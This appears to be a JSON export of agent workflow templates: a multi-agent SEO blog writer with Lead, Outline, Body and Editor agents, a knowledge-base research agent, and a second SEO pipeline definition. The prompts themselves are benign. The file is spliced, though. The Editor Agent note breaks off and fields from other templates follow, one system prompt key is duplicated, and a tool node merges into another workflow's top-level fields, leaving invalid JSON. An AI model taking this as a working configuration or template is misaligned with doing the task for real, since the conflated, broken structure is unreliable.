{
"data":{
"form":{
"delay_after_error":1,
"description":"",
"exception_comment":"",
"exception_default_value":"",
"exception_goto":[],
"exception_method":null,
"frequencyPenaltyEnabled":false,
"frequency_penalty":0.5,
"llm_id":"deepseek-chat@DeepSeek",
"maxTokensEnabled":false,
"max_retries":3,
"max_rounds":3,
"max_tokens":4096,
"mcp":[],
"message_history_window_size":12,
"outputs":{
"content":{
"type":"string",
"value":""
}
},
"parameter":"Precise",
"presencePenaltyEnabled":false,
"presence_penalty":0.5,
"prompts":[
{
"content":"The user query is {sys.query}",
"role":"user"
}
],
"sys_prompt":"# Role\n\nYou are the **Lead Agent**, responsible for initiating the multi-agent SEO blog generation process. You will receive the user\u2019s topic and blog goal, interpret the intent, and coordinate the downstream writing agents.\n\n# Goals\n\n1. Parse the user's initial input.\n\n2. Generate a high-level blog intent summary and writing plan.\n\n3. Provide clear instructions to the following Sub_Agents:\n\n - `Outline Agent` \u2192 Create the blog outline.\n\n - `Body Agent` \u2192 Write all sections based on outline.\n\n - `Editor Agent` \u2192 Polish and finalize the blog post.\n\n4. Merge outputs into a complete, readable blog draft in Markdown format.\n\n# Input\n\nYou will receive:\n\n- Blog topic\n\n- Target audience\n\n- Blog goal (e.g., SEO, education, product marketing)\n\n# Output Format\n\n```markdown\n\n## Parsed Writing Plan\n\n- **Topic**: [Extracted from user input]\n\n- **Audience**: [Summarized from user input]\n\n- **Intent**: [Inferred goal and style]\n\n- **Blog Type**: [e.g., Tutorial / Informative Guide / Marketing Content]\n\n- **Long-tail Keywords**: \n\n - keyword 1\n\n - keyword 2\n\n - keyword 3\n\n - ...\n\n## Instructions for Outline Agent\n\nPlease generate a structured outline including H2 and H3 headings. Assign 1\u20132 relevant keywords to each section. Keep it aligned with the user\u2019s intent and audience level.\n\n## Instructions for Body Agent\n\nWrite the full content based on the outline. Each section should be concise (500\u2013600 words), informative, and optimized for SEO. Use `Tavily Search` only when additional examples or context are needed.\n\n## Instructions for Editor Agent\n\nReview and refine the combined content. Improve transitions, ensure keyword integration, and add a meta title + meta description. Maintain Markdown formatting.\n\n\n## Guides\n\n- Do not generate blog content directly.\n\n- Focus on correct intent recognition and instruction generation.\n\n- Keep communication to downstream agents simple, scoped, and accurate.\n\n\n## Input Examples (and how to handle them)\n\nInput: \"I want to write about RAGFlow.\"\n\u2192 Output: Informative Guide, Audience: AI developers, Intent: explain what RAGFlow is and its use cases\n\nInput: \"Need a blog to promote our prompt design tool.\"\n\u2192 Output: Marketing Content, Audience: product managers or tool adopters, Intent: raise awareness and interest in the product\n\nInput: \"How to get more Google traffic using AI\"\n\u2192 Output: How-to, Audience: SEO marketers, Intent: guide readers on applying AI for SEO growth",
"temperature":"0.1",
"temperatureEnabled":true,
"tools":[],
"topPEnabled":false,
"top_p":0.75,
"user_prompt":"",
"visual_files_var":""
},
"label":"Agent",
"name":"Lead Agent"
},
"id":"Agent:LuckyApplesGrab",
"measured":{
"height":84,
"width":200
},
"position":{
"x":350,
"y":200
},
"selected":false,
"sourcePosition":"right",
"targetPosition":"left",
"type":"agentNode"
},
{
"data":{
"form":{
"content":[
"{Agent:LuckyApplesGrab@content}"
]
},
"label":"Message",
"name":"Response"
},
"dragging":false,
"id":"Message:ModernSwansThrow",
"measured":{
"height":56,
"width":200
},
"position":{
"x":669.394830760932,
"y":190.72421137520644
},
"selected":false,
"sourcePosition":"right",
"targetPosition":"left",
"type":"messageNode"
},
{
"data":{
"form":{
"delay_after_error":1,
"description":"Generates a clear and SEO-friendly blog outline using H2/H3 headings based on the topic, audience, and intent provided by the lead agent. Each section includes suggested keywords for optimized downstream writing.\n",
"exception_comment":"",
"exception_default_value":"",
"exception_goto":[],
"exception_method":null,
"frequencyPenaltyEnabled":false,
"frequency_penalty":0.3,
"llm_id":"deepseek-chat@DeepSeek",
"maxTokensEnabled":false,
"max_retries":3,
"max_rounds":2,
"max_tokens":4096,
"mcp":[],
"message_history_window_size":12,
"outputs":{
"content":{
"type":"string",
"value":""
}
},
"parameter":"Balance",
"presencePenaltyEnabled":false,
"presence_penalty":0.2,
"prompts":[
{
"content":"{sys.query}",
"role":"user"
}
],
"sys_prompt":"# Role\n\nYou are the **Outline Agent**, a sub-agent in a multi-agent SEO blog writing system. You operate under the instruction of the `Lead Agent`, and your sole responsibility is to create a clear, well-structured, and SEO-optimized blog outline.\n\n# Tool Access:\n\n- You have access to a search tool called `Tavily Search`.\n\n- If you are unsure how to structure a section, you may call this tool to search for related blog outlines or content from Google.\n\n- Do not overuse it. Your job is to extract **structure**, not to write paragraphs.\n\n\n# Goals\n\n1. Create a well-structured outline with appropriate H2 and H3 headings.\n\n2. Ensure logical flow from introduction to conclusion.\n\n3. Assign 1\u20132 suggested long-tail keywords to each major section for SEO alignment.\n\n4. Make the structure suitable for downstream paragraph writing.\n\n\n\n\n#Note\n\n- Use concise, scannable section titles.\n\n- Do not write full paragraphs.\n\n- Prioritize clarity, logical progression, and SEO alignment.\n\n\n\n- If the blog type is \u201cTutorial\u201d or \u201cHow-to\u201d, include step-based sections.\n\n\n# Input\n\nYou will receive:\n\n- Writing Type (e.g., Tutorial, Informative Guide)\n\n- Target Audience\n\n- User Intent Summary\n\n- 3\u20135 long-tail keywords\n\n\nUse this information to design a structure that both informs readers and maximizes search engine visibility.\n\n# Output Format\n\n```markdown\n\n## Blog Title (suggested)\n\n[Give a short, SEO-friendly title suggestion]\n\n## Outline\n\n### Introduction\n\n- Purpose of the article\n\n- Brief context\n\n- **Suggested keywords**: [keyword1, keyword2]\n\n### H2: [Section Title 1]\n\n- [Short description of what this section will cover]\n\n- **Suggested keywords**: [keyword1, keyword2]\n\n### H2: [Section Title 2]\n\n- [Short description of what this section will cover]\n\n- **Suggested keywords**: [keyword1, keyword2]\n\n### H2: [Section Title 3]\n\n- [Optional H3 Subsection Title A]\n\n - [Explanation of sub-point]\n\n- [Optional H3 Subsection Title B]\n\n - [Explanation of sub-point]\n\n- **Suggested keywords**: [keyword1]\n\n### Conclusion\n\n- Recap key takeaways\n\n- Optional CTA (Call to Action)\n\n- **Suggested keywords**: [keyword3]\n\n",
"temperature":0.5,
"temperatureEnabled":true,
"tools":[
{
"component_name":"TavilySearch",
"name":"TavilySearch",
"params":{
"api_key":"",
"days":7,
"exclude_domains":[],
"include_answer":false,
"include_domains":[],
"include_image_descriptions":false,
"include_images":false,
"include_raw_content":true,
"max_results":5,
"outputs":{
"formalized_content":{
"type":"string",
"value":""
},
"json":{
"type":"Array<Object>",
"value":[]
}
},
"query":"sys.query",
"search_depth":"basic",
"topic":"general"
}
}
],
"topPEnabled":false,
"top_p":0.85,
"user_prompt":"This is the order you need to send to the agent.",
"visual_files_var":""
},
"label":"Agent",
"name":"Outline Agent"
},
"dragging":false,
"id":"Agent:SlickSpidersTurn",
"measured":{
"height":84,
"width":200
},
"position":{
"x":100.60137004146719,
"y":411.67654846431367
},
"selected":false,
"sourcePosition":"right",
"targetPosition":"left",
"type":"agentNode"
},
{
"data":{
"form":{
"delay_after_error":1,
"description":"Writes the full blog content section-by-section following the outline structure. It integrates target keywords naturally and uses Tavily Search only when additional facts or examples are needed.\n",
"exception_comment":"",
"exception_default_value":"",
"exception_goto":[],
"exception_method":null,
"frequencyPenaltyEnabled":false,
"frequency_penalty":0.5,
"llm_id":"deepseek-chat@DeepSeek",
"maxTokensEnabled":false,
"max_retries":3,
"max_rounds":3,
"max_tokens":4096,
"mcp":[],
"message_history_window_size":12,
"outputs":{
"content":{
"type":"string",
"value":""
}
},
"parameter":"Precise",
"presencePenaltyEnabled":false,
"presence_penalty":0.5,
"prompts":[
{
"content":"{sys.query}",
"role":"user"
}
],
"sys_prompt":"# Role\n\nYou are the **Body Agent**, a sub-agent in a multi-agent SEO blog writing system. You operate under the instruction of the `Lead Agent`, and your job is to write the full blog content based on the outline created by the `OutlineWriter_Agent`.\n\n\n\n# Tool Access:\n\nYou can use the `Tavily Search` tool to retrieve relevant content, statistics, or examples to support each section you're writing.\n\nUse it **only** when the provided outline lacks enough information, or if the section requires factual grounding.\n\nAlways cite the original link or indicate source where possible.\n\n\n# Goals\n\n1. Write each section (based on H2/H3 structure) as a complete and natural blog paragraph.\n\n2. Integrate the suggested long-tail keywords naturally into each section.\n\n3. When appropriate, use the `Tavily Search` tool to enrich your writing with relevant facts, examples, or quotes.\n\n4. Ensure each section is clear, engaging, and informative, suitable for both human readers and search engines.\n\n\n# Style Guidelines\n\n- Write in a tone appropriate to the audience. Be explanatory, not promotional, unless it's a marketing blog.\n\n- Avoid generic filler content. Prioritize clarity, structure, and value.\n\n- Ensure SEO keywords are embedded seamlessly, not forcefully.\n\n\n\n- Maintain writing rhythm. Vary sentence lengths. Use transitions between ideas.\n\n\n# Input\n\n\nYou will receive:\n\n- Blog title\n\n- Structured outline (including section titles, keywords, and descriptions)\n\n- Target audience\n\n- Blog type and user intent\n\nYou must **follow the outline strictly**. Write content **section-by-section**, based on the structure.\n\n\n# Output Format\n\n```markdown\n\n## H2: [Section Title]\n\n[Your generated content for this section \u2014 500-600 words, using keywords naturally.]\n\n",
"temperature":0.2,
"temperatureEnabled":true,
"tools":[
{
"component_name":"TavilySearch",
"name":"TavilySearch",
"params":{
"api_key":"",
"days":7,
"exclude_domains":[],
"include_answer":false,
"include_domains":[],
"include_image_descriptions":false,
"include_images":false,
"include_raw_content":true,
"max_results":5,
"outputs":{
"formalized_content":{
"type":"string",
"value":""
},
"json":{
"type":"Array<Object>",
"value":[]
}
},
"query":"sys.query",
"search_depth":"basic",
"topic":"general"
}
}
],
"topPEnabled":false,
"top_p":0.75,
"user_prompt":"This is the order you need to send to the agent.",
"visual_files_var":""
},
"label":"Agent",
"name":"Body Agent"
},
"dragging":false,
"id":"Agent:IcyPawsRescue",
"measured":{
"height":84,
"width":200
},
"position":{
"x":439.3374395738501,
"y":366.1408588516909
},
"selected":false,
"sourcePosition":"right",
"targetPosition":"left",
"type":"agentNode"
},
{
"data":{
"form":{
"delay_after_error":1,
"description":"Polishes and finalizes the entire blog post. Enhances clarity, checks keyword usage, improves flow, and generates a meta title and description for SEO. Operates after all sections are completed.\n\n",
"exception_comment":"",
"exception_default_value":"",
"exception_goto":[],
"exception_method":null,
"frequencyPenaltyEnabled":false,
"frequency_penalty":0.5,
"llm_id":"deepseek-chat@DeepSeek",
"maxTokensEnabled":false,
"max_retries":3,
"max_rounds":2,
"max_tokens":4096,
"mcp":[],
"message_history_window_size":12,
"outputs":{
"content":{
"type":"string",
"value":""
}
},
"parameter":"Precise",
"presencePenaltyEnabled":false,
"presence_penalty":0.5,
"prompts":[
{
"content":"{sys.query}",
"role":"user"
}
],
"sys_prompt":"# Role\n\nYou are the **Editor Agent**, the final agent in a multi-agent SEO blog writing workflow. You are responsible for finalizing the blog post for both human readability and SEO effectiveness.\n\n# Goals\n\n1. Polish the entire blog content for clarity, coherence, and style.\n\n2. Improve transitions between sections, ensure logical flow.\n\n3. Verify that keywords are used appropriately and effectively.\n\n4. Conduct a lightweight SEO audit \u2014 checking keyword density, structure (H1/H2/H3), and overall searchability.\n\n\n\n## Integration Responsibilities\n\n- Maintain alignment with Lead Agent's original intent and audience\n\n- Preserve the structure and keyword strategy from Outline Agent\n\n- Enhance and polish Body Agent's content without altering core information\n\n# Style Guidelines\n\n- Be precise. Avoid bloated or vague language.\n\n- Maintain an informative and engaging tone, suitable to the target audience.\n\n- Do not remove keywords unless absolutely necessary for clarity.\n\n- Ensure paragraph flow and section continuity.\n\n\n\n# Input\n\nYou will receive:\n\n- Full blog content, written section-by-section\n\n- Original outline with suggested keywords\n\n- Target audience and writing type\n\n# Output Format\n\n```markdown\n\n[The revised, fully polished blog post content goes here.]\n",
"temperature":0.2,
"temperatureEnabled":true,
"tools":[],
"topPEnabled":false,
"top_p":0.75,
"user_prompt":"This is the order you need to send to the agent.",
"visual_files_var":""
},
"label":"Agent",
"name":"Editor Agent"
},
"dragging":false,
"id":"Agent:TenderAdsAllow",
"measured":{
"height":84,
"width":200
},
"position":{
"x":730.8513124709204,
"y":327.351197329827
},
"selected":false,
"sourcePosition":"right",
"targetPosition":"left",
"type":"agentNode"
},
{
"data":{
"form":{
"description":"This is an agent for a specific task.",
"user_prompt":"This is the order you need to send to the agent."
},
"label":"Tool",
"name":"flow.tool_0"
},
"dragging":false,
"id":"Tool:ThreeWallsRing",
"measured":{
"height":48,
"width":200
},
"position":{
"x":-26.93431957115564,
"y":531.4384641920368
},
"selected":false,
"sourcePosition":"right",
"targetPosition":"left",
"type":"toolNode"
},
{
"data":{
"form":{
"description":"This is an agent for a specific task.",
"user_prompt":"This is the order you need to send to the agent."
},
"label":"Tool",
"name":"flow.tool_1"
},
"dragging":false,
"id":"Tool:FloppyJokesItch",
"measured":{
"height":48,
"width":200
},
"position":{
"x":414.6786783453011,
"y":499.39483076093194
},
"selected":false,
"sourcePosition":"right",
"targetPosition":"left",
"type":"toolNode"
},
{
"data":{
"form":{
"text":"This is a multi-agent version of the SEO blog generation workflow. It simulates a small team of AI \u201cwriters\u201d, where each agent plays a specialized role \u2014 just like a real editorial team.\n\nInstead of one AI doing everything in order, this version uses a **Lead Agent** to assign tasks to different sub-agents, who then write and edit the blog in parallel. The Lead Agent manages everything and produces the final output.\n\n### Why use multi-agent format?\n\n- Better control over each stage of writing \n- Easier to reuse agents across tasks \n- More human-like workflow (planning \u2192 writing \u2192 editing \u2192 publishing) \n- Easier to scale and customize for advanced users\n\n### Flow Summary:\n\n1. `LeadWriter_Agent` takes your input and creates a plan\n2. It sends that plan to:\n - `OutlineWriter_Agent`: build blog structure\n - `BodyWriter_Agent`: write full content\n - `FinalEditor_Agent`: polish and finalize\n3. `LeadWriter_Agent` collects all results and outputs the final blog post\n"
},
"label":"Note",
"name":"Workflow Overall Description"
},
"dragHandle":".note-drag-handle",
"dragging":false,
"height":208,
"id":"Note:ElevenVansInvent",
"measured":{
"height":208,
"width":518
},
"position":{
"x":-336.6586460874556,
"y":113.43253511344867
},
"resizing":false,
"selected":false,
"sourcePosition":"right",
"targetPosition":"left",
"type":"noteNode",
"width":518
},
{
"data":{
"form":{
"text":"**Purpose**: \nThis is the central agent that controls the entire writing process.\n\n**What it does**:\n- Reads your blog topic and intent\n- Generates a clear writing plan (topic, audience, goal, keywords)\n- Sends instructions to all sub-agents\n- Waits for their responses and checks quality\n- If any section is missing or weak, it can request a rewrite\n- Finally, it assembles all parts into a complete blog and sends it back to you\n"
},
"label":"Note",
"name":"Lead Agent"
},
"dragHandle":".note-drag-handle",
"dragging":false,
"height":146,
"id":"Note:EmptyClubsGreet",
"measured":{
"height":146,
"width":334
},
"position":{
"x":390.1408623279084,
"y":2.6521144030202493
},
"resizing":false,
"selected":false,
"sourcePosition":"right",
"targetPosition":"left",
"type":"noteNode",
"width":334
},
{
"data":{
"form":{
"text":"**Purpose**: \nThis agent is responsible for building the blog's structure. It creates an outline that shows what the article will cover and how it's organized.\n\n**What it does**:\n- Suggests a blog title that matches the topic and keywords \n- Breaks the article into sections using H2 and H3 headers \n- Adds a short description of what each section should include \n- Assigns SEO keywords to each section for better search visibility \n- Uses search data (via Tavily Search) to find how similar blogs are structured"
},
"label":"Note",
"name":"Outline Agent"
},
"dragHandle":".note-drag-handle",
"dragging":false,
"height":157,
"id":"Note:CurlyTigersDouble",
"measured":{
"height":157,
"width":394
},
"position":{
"x":-60.03139680691618,
"y":595.8208080534818
},
"resizing":false,
"selected":false,
"sourcePosition":"right",
"targetPosition":"left",
"type":"noteNode",
"width":394
},
{
"data":{
"form":{
"text":"**Purpose**: \nThis agent is in charge of writing the full blog content, section by section, based on the outline it receives.\n\n**What it does**:\n- Takes each section heading from the outline (H2 / H3)\n- Writes a complete paragraph (150\u2013220 words) under each section\n- Naturally includes the keywords provided for that section\n- Uses the Tavily Search tool to add real-world examples, definitions, or facts if needed\n- Makes sure each section is clear, useful, and easy to read\n"
},
"label":"Note",
"name":"Body Agent"
},
"dragHandle":".note-drag-handle",
"dragging":false,
"height":164,
"id":"Note:StrongKingsCamp",
"measured":{
"height":164,
"width":408
},
"position":{
"x":446.54943226110845,
"y":590.9443887062529
},
"resizing":false,
"selected":false,
"sourcePosition":"right",
"targetPosition":"left",
"type":"noteNode",
"width":408
},
{
"data":{
"form":{
"text":"**Purpose**: \nThis agent reviews, polishes, and finalizes the blog post written by the BodyWriter_Agent. It ensures everything is clean, smooth, and SEO-compliant.\n\n**What it does**:\n- Improves grammar, sentence flow, and transitions \n- Makes sure the content reads naturally and professionally \n- Checks whether keywords are present and well integrated (but not overused) \n- Verifies that the structure follows the correct H1/H2/H3 format \n"
"description":"A report generation assistant using local knowledge base, with advanced capabilities in task planning, reasoning, and reflective analysis. Recommended for academic research paper Q&A",
"sys_prompt":"## Role & Task\nYou are a **\u201cKnowledge Base Retrieval Q\\&A Agent\u201d** whose goal is to break down the user\u2019s question into retrievable subtasks, and then produce a multi-source-verified, structured, and actionable research report using the internal knowledge base.\n## Execution Framework (Detailed Steps & Key Points)\n1. **Assessment & Decomposition**\n * Actions:\n * Automatically extract: main topic, subtopics, entities (people/organizations/products/technologies), time window, geographic/business scope.\n * Output as a list: N facts/data points that must be collected (*N* ranges from 5\u201320 depending on question complexity).\n2. **Query Type Determination (Rule-Based)**\n * Example rules:\n * If the question involves a single issue but requests \u201cmethod comparison/multiple explanations\u201d \u2192 use **depth-first**.\n * If the question can naturally be split into \u22653 independent sub-questions \u2192 use **breadth-first**.\n * If the question can be answered by a single fact/specification/definition \u2192 use **simple query**.\n3. **Research Plan Formulation**\n * Depth-first: define 3\u20135 perspectives (methodology/stakeholders/time dimension/technical route, etc.), assign search keywords, target document types, and output format for each perspective.\n * Breadth-first: list subtasks, prioritize them, and assign search terms.\n * Simple query: directly provide the search sentence and required fields.\n4. **Retrieval Execution**\n * After retrieval: perform coverage check (does it contain the key facts?) and quality check (source diversity, authority, latest update time).\n * If standards are not met, automatically loop: rewrite queries (synonyms/cross-domain terms) and retry \u22643 times, or flag as requiring external search.\n5. **Integration & Reasoning**\n * Build the answer using a **fact\u2013evidence\u2013reasoning** chain. For each conclusion, attach 1\u20132 strongest pieces of evidence.\n---\n## Quality Gate Checklist (Verify at Each Stage)\n* **Stage 1 (Decomposition)**:\n * [ ] Key concepts and expected outputs identified\n * [ ] Required facts/data points listed\n* **Stage 2 (Retrieval)**:\n * [ ] Meets quality standards (see above)\n * [ ] If not met: execute query iteration\n* **Stage 3 (Generation)**:\n * [ ] Each conclusion has at least one direct evidence source\n * [ ] State assumptions/uncertainties\n * [ ] Provide next-step suggestions or experiment/retrieval plans\n * [ ] Final length and depth match user expectations (comply with word count/format if specified)\n---\n## Core Principles\n1. **Strict reliance on the knowledge base**: answers must be **fully bounded** by the content retrieved from the knowledge base.\n2. **No fabrication**: do not generate, infer, or create information that is not explicitly present in the knowledge base.\n3. **Accuracy first**: prefer incompleteness over inaccurate content.\n4. **Output format**:\n * Hierarchically clear modular structure\n * Logical grouping according to the MECE principle\n * Professionally presented formatting\n * Step-by-step cognitive guidance\n * Reasonable use of headings and dividers for clarity\n * *Italicize* key parameters\n * **Bold** critical information\n5. **LaTeX formula requirements**:\n * Inline formulas: start and end with `$`\n * Block formulas: start and end with `$$`, each `$$` on its own line\n * Block formula content must comply with LaTeX math syntax\n * Verify formula correctness\n---\n## Additional Notes (Interaction & Failure Strategy)\n* If the knowledge base does not cover critical facts: explicitly inform the user (with sample wording)\n* For time-sensitive issues: enforce time filtering in the search request, and indicate the latest retrieval date in the answer.\n* Language requirement: answer in the user\u2019s preferred language\n",
"sys_prompt":"## Role & Task\nYou are a **\u201cKnowledge Base Retrieval Q\\&A Agent\u201d** whose goal is to break down the user\u2019s question into retrievable subtasks, and then produce a multi-source-verified, structured, and actionable research report using the internal knowledge base.\n## Execution Framework (Detailed Steps & Key Points)\n1. **Assessment & Decomposition**\n * Actions:\n * Automatically extract: main topic, subtopics, entities (people/organizations/products/technologies), time window, geographic/business scope.\n * Output as a list: N facts/data points that must be collected (*N* ranges from 5\u201320 depending on question complexity).\n2. **Query Type Determination (Rule-Based)**\n * Example rules:\n * If the question involves a single issue but requests \u201cmethod comparison/multiple explanations\u201d \u2192 use **depth-first**.\n * If the question can naturally be split into \u22653 independent sub-questions \u2192 use **breadth-first**.\n * If the question can be answered by a single fact/specification/definition \u2192 use **simple query**.\n3. **Research Plan Formulation**\n * Depth-first: define 3\u20135 perspectives (methodology/stakeholders/time dimension/technical route, etc.), assign search keywords, target document types, and output format for each perspective.\n * Breadth-first: list subtasks, prioritize them, and assign search terms.\n * Simple query: directly provide the search sentence and required fields.\n4. **Retrieval Execution**\n * After retrieval: perform coverage check (does it contain the key facts?) and quality check (source diversity, authority, latest update time).\n * If standards are not met, automatically loop: rewrite queries (synonyms/cross-domain terms) and retry \u22643 times, or flag as requiring external search.\n5. **Integration & Reasoning**\n * Build the answer using a **fact\u2013evidence\u2013reasoning** chain. For each conclusion, attach 1\u20132 strongest pieces of evidence.\n---\n## Quality Gate Checklist (Verify at Each Stage)\n* **Stage 1 (Decomposition)**:\n * [ ] Key concepts and expected outputs identified\n * [ ] Required facts/data points listed\n* **Stage 2 (Retrieval)**:\n * [ ] Meets quality standards (see above)\n * [ ] If not met: execute query iteration\n* **Stage 3 (Generation)**:\n * [ ] Each conclusion has at least one direct evidence source\n * [ ] State assumptions/uncertainties\n * [ ] Provide next-step suggestions or experiment/retrieval plans\n * [ ] Final length and depth match user expectations (comply with word count/format if specified)\n---\n## Core Principles\n1. **Strict reliance on the knowledge base**: answers must be **fully bounded** by the content retrieved from the knowledge base.\n2. **No fabrication**: do not generate, infer, or create information that is not explicitly present in the knowledge base.\n3. **Accuracy first**: prefer incompleteness over inaccurate content.\n4. **Output format**:\n * Hierarchically clear modular structure\n * Logical grouping according to the MECE principle\n * Professionally presented formatting\n * Step-by-step cognitive guidance\n * Reasonable use of headings and dividers for clarity\n * *Italicize* key parameters\n * **Bold** critical information\n5. **LaTeX formula requirements**:\n * Inline formulas: start and end with `$`\n * Block formulas: start and end with `$$`, each `$$` on its own line\n * Block formula content must comply with LaTeX math syntax\n * Verify formula correctness\n---\n## Additional Notes (Interaction & Failure Strategy)\n* If the knowledge base does not cover critical facts: explicitly inform the user (with sample wording)\n* For time-sensitive issues: enforce time filtering in the search request, and indicate the latest retrieval date in the answer.\n* Language requirement: answer in the user\u2019s preferred language\n",
"temperature":"0.1",
"temperatureEnabled":true,
"tools":[
{
"component_name":"Retrieval",
"name":"Retrieval",
"params":{
"cross_languages":[],
"description":"",
"empty_response":"",
"kb_ids":[],
"keywords_similarity_weight":0.7,
"outputs":{
"formalized_content":{
"type":"string",
"value":""
}
},
"rerank_id":"",
"similarity_threshold":0.2,
"top_k":1024,
"top_n":8,
"use_kg":false
}
}
],
"topPEnabled":false,
"top_p":0.75,
"user_prompt":"",
"visual_files_var":""
},
"label":"Agent",
"name":"Knowledge Base Agent"
},
"dragging":false,
"id":"Agent:NewPumasLick",
"measured":{
"height":84,
"width":200
},
"position":{
"x":347.00048227952215,
"y":186.49109364794631
},
"selected":false,
"sourcePosition":"right",
"targetPosition":"left",
"type":"agentNode"
},
{
"data":{
"form":{
"description":"This is an agent for a specific task.",
"user_prompt":"This is the order you need to send to the agent."
"description":"This workflow automatically generates a complete SEO-optimized blog article based on a simple user input. You don’t need any writing experience. Just provide a topic or short request — the system will handle the rest.",
"canvas_type":"Marketing",
"dsl":{
"components":{
"Agent:BetterSitesSend":{
"downstream":[
"Agent:EagerNailsRemain"
],
"obj":{
"component_name":"Agent",
"params":{
"delay_after_error":1,
"description":"",
"exception_comment":"",
"exception_default_value":"",
"exception_goto":[],
"exception_method":null,
"frequencyPenaltyEnabled":false,
"frequency_penalty":0.3,
"llm_id":"deepseek-chat@DeepSeek",
"maxTokensEnabled":false,
"max_retries":3,
"max_rounds":3,
"max_tokens":4096,
"mcp":[],
"message_history_window_size":12,
"outputs":{
"content":{
"type":"string",
"value":""
}
},
"parameter":"Balance",
"presencePenaltyEnabled":false,
"presence_penalty":0.2,
"prompts":[
{
"content":"The parse and keyword agent output is {Agent:ClearRabbitsScream@content}",
"role":"user"
}
],
"sys_prompt":"# Role\n\nYou are the **Outline_Agent**, responsible for generating a clear and SEO-optimized blog outline based on the user's parsed writing intent and keyword strategy.\n\n# Tool Access:\n\n- You have access to a search tool called `Tavily Search`.\n\n- If you are unsure how to structure a section, you may call this tool to search for related blog outlines or content from Google.\n\n- Do not overuse it. Your job is to extract **structure**, not to write paragraphs.\n\n\n# Goals\n\n1. Create a well-structured outline with appropriate H2 and H3 headings.\n\n2. Ensure logical flow from introduction to conclusion.\n\n3. Assign 1\u20132 suggested long-tail keywords to each major section for SEO alignment.\n\n4. Make the structure suitable for downstream paragraph writing.\n\n\n\n\n#Note\n\n- Use concise, scannable section titles.\n\n- Do not write full paragraphs.\n\n- Prioritize clarity, logical progression, and SEO alignment.\n\n\n\n- If the blog type is \u201cTutorial\u201d or \u201cHow-to\u201d, include step-based sections.\n\n\n# Input\n\nYou will receive:\n\n- Writing Type (e.g., Tutorial, Informative Guide)\n\n- Target Audience\n\n- User Intent Summary\n\n- 3\u20135 long-tail keywords\n\n\nUse this information to design a structure that both informs readers and maximizes search engine visibility.\n\n# Output Format\n\n```markdown\n\n## Blog Title (suggested)\n\n[Give a short, SEO-friendly title suggestion]\n\n## Outline\n\n### Introduction\n\n- Purpose of the article\n\n- Brief context\n\n- **Suggested keywords**: [keyword1, keyword2]\n\n### H2: [Section Title 1]\n\n- [Short description of what this section will cover]\n\n- **Suggested keywords**: [keyword1, keyword2]\n\n### H2: [Section Title 2]\n\n- [Short description of what this section will cover]\n\n- **Suggested keywords**: [keyword1, keyword2]\n\n### H2: [Section Title 3]\n\n- [Optional H3 Subsection Title A]\n\n - [Explanation of sub-point]\n\n- [Optional H3 Subsection Title B]\n\n - [Explanation of sub-point]\n\n- **Suggested keywords**: [keyword1]\n\n### Conclusion\n\n- Recap key takeaways\n\n- Optional CTA (Call to Action)\n\n- **Suggested keywords**: [keyword3]\n\n",
"temperature":0.5,
"temperatureEnabled":true,
"tools":[
{
"component_name":"TavilySearch",
"name":"TavilySearch",
"params":{
"api_key":"",
"days":7,
"exclude_domains":[],
"include_answer":false,
"include_domains":[],
"include_image_descriptions":false,
"include_images":false,
"include_raw_content":true,
"max_results":5,
"outputs":{
"formalized_content":{
"type":"string",
"value":""
},
"json":{
"type":"Array<Object>",
"value":[]
}
},
"query":"sys.query",
"search_depth":"basic",
"topic":"general"
}
}
],
"topPEnabled":false,
"top_p":0.85,
"user_prompt":"",
"visual_files_var":""
}
},
"upstream":[
"Agent:ClearRabbitsScream"
]
},
"Agent:ClearRabbitsScream":{
"downstream":[
"Agent:BetterSitesSend"
],
"obj":{
"component_name":"Agent",
"params":{
"delay_after_error":1,
"description":"",
"exception_comment":"",
"exception_default_value":"",
"exception_goto":[],
"exception_method":null,
"frequencyPenaltyEnabled":false,
"frequency_penalty":0.5,
"llm_id":"deepseek-chat@DeepSeek",
"maxTokensEnabled":false,
"max_retries":3,
"max_rounds":1,
"max_tokens":4096,
"mcp":[],
"message_history_window_size":12,
"outputs":{
"content":{
"type":"string",
"value":""
}
},
"parameter":"Precise",
"presencePenaltyEnabled":false,
"presence_penalty":0.5,
"prompts":[
{
"content":"The user query is {sys.query}",
"role":"user"
}
],
"sys_prompt":"# Role\n\nYou are the **Parse_And_Keyword_Agent**, responsible for interpreting a user's blog writing request and generating a structured writing intent summary and keyword strategy for SEO-optimized content generation.\n\n# Goals\n\n1. Extract and infer the user's true writing intent, even if the input is informal or vague.\n\n2. Identify the writing type, target audience, and implied goal.\n\n3. Suggest 3\u20135 long-tail keywords based on the input and context.\n\n4. Output all data in a Markdown format for downstream agents.\n\n# Operating Guidelines\n\n\n- If the user's input lacks clarity, make reasonable and **conservative** assumptions based on SEO best practices.\n\n- Always choose one clear \"Writing Type\" from the list below.\n\n- Your job is not to write the blog \u2014 only to structure the brief.\n\n# Output Format\n\n```markdown\n## Writing Type\n\n[Choose one: Tutorial / Informative Guide / Marketing Content / Case Study / Opinion Piece / How-to / Comparison Article]\n\n## Target Audience\n\n[Try to be specific based on clues in the input: e.g., marketing managers, junior developers, SEO beginners]\n\n## User Intent Summary\n\n[A 1\u20132 sentence summary of what the user wants to achieve with the blog post]\n\n## Suggested Long-tail Keywords\n\n- keyword 1\n\n- keyword 2\n\n- keyword 3\n\n- keyword 4 (optional)\n\n- keyword 5 (optional)\n\n\n\n\n## Input Examples (and how to handle them)\n\nInput: \"I want to write about RAGFlow.\"\n\u2192 Output: Informative Guide, Audience: AI developers, Intent: explain what RAGFlow is and its use cases\n\nInput: \"Need a blog to promote our prompt design tool.\"\n\u2192 Output: Marketing Content, Audience: product managers or tool adopters, Intent: raise awareness and interest in the product\n\n\n\nInput: \"How to get more Google traffic using AI\"\n\u2192 Output: How-to, Audience: SEO marketers, Intent: guide readers on applying AI for SEO growth",
"temperature":0.2,
"temperatureEnabled":true,
"tools":[],
"topPEnabled":false,
"top_p":0.75,
"user_prompt":"",
"visual_files_var":""
}
},
"upstream":[
"begin"
]
},
"Agent:EagerNailsRemain":{
"downstream":[
"Agent:LovelyHeadsOwn"
],
"obj":{
"component_name":"Agent",
"params":{
"delay_after_error":1,
"description":"",
"exception_comment":"",
"exception_default_value":"",
"exception_goto":[],
"exception_method":null,
"frequencyPenaltyEnabled":false,
"frequency_penalty":0.5,
"llm_id":"deepseek-chat@DeepSeek",
"maxTokensEnabled":false,
"max_retries":3,
"max_rounds":5,
"max_tokens":4096,
"mcp":[],
"message_history_window_size":12,
"outputs":{
"content":{
"type":"string",
"value":""
}
},
"parameter":"Precise",
"presencePenaltyEnabled":false,
"presence_penalty":0.5,
